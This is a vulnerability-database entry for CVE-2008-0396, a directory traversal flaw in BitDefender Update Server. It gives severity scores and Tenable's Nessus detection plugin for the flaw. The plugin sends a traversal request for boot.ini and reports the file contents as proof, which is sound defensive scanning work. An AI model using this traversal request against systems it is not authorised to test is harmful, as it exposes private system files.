7.8 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:C/I:N/A:N
0.02 Low
EPSS
Percentile
88.8%
The version of BitDefender Update Server running on the remote host fails to sanitize request strings of directory traversal sequences, which allows an unauthenticated attacker to read files outside the web server’s document directory.
Note that the server runs with LocalSystem privileges by default.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(30021);
script_version("1.21");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2008-0396");
script_bugtraq_id(27358);
script_name(english:"BitDefender Update Server HTTP Request Traversal Arbitrary File Access");
script_set_attribute(attribute:"synopsis", value:
"The remote web server is affected by a directory traversal
vulnerability.");
script_set_attribute(attribute:"description", value:
"The version of BitDefender Update Server running on the remote host
fails to sanitize request strings of directory traversal sequences,
which allows an unauthenticated attacker to read files outside the web
server's document directory.
Note that the server runs with LocalSystem privileges by default.");
script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/486701/30/0/threaded");
script_set_attribute(attribute:"solution", value:
"Apply the patch referenced in the vendor advisory.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_cwe_id(22);
script_set_attribute(attribute:"plugin_publication_date", value:"2008/01/21");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:bitdefender:update_server");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2008-2022 Tenable Network Security, Inc.");
script_dependencies("bitdefender_update_server_detect.nasl");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www");
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_kb_item("Services/www");
if (!get_kb_item("www/"+port+"/bitdefender_update_server")) exit(0);
# Try to exploit the issue.
file = "/../../../../../../../../../../../../boot.ini";
r = http_send_recv3(method:"GET", item:file, port:port, exit_on_fail: 1);
# There's a problem if looks like boot.ini.
if ("[boot loader]">< r[2])
{
if (report_verbosity)
{
report = string(
"Here are the contents of the file '\\boot.ini' that Nessus was able to\n",
"read from the remote host :\n",
"\n",
r[2]
);
security_hole(port:port, extra:report);
}
else security_hole(port);
}
Vendor | Product | Version | CPE |
---|---|---|---|
bitdefender | update_server | cpe:/a:bitdefender:update_server |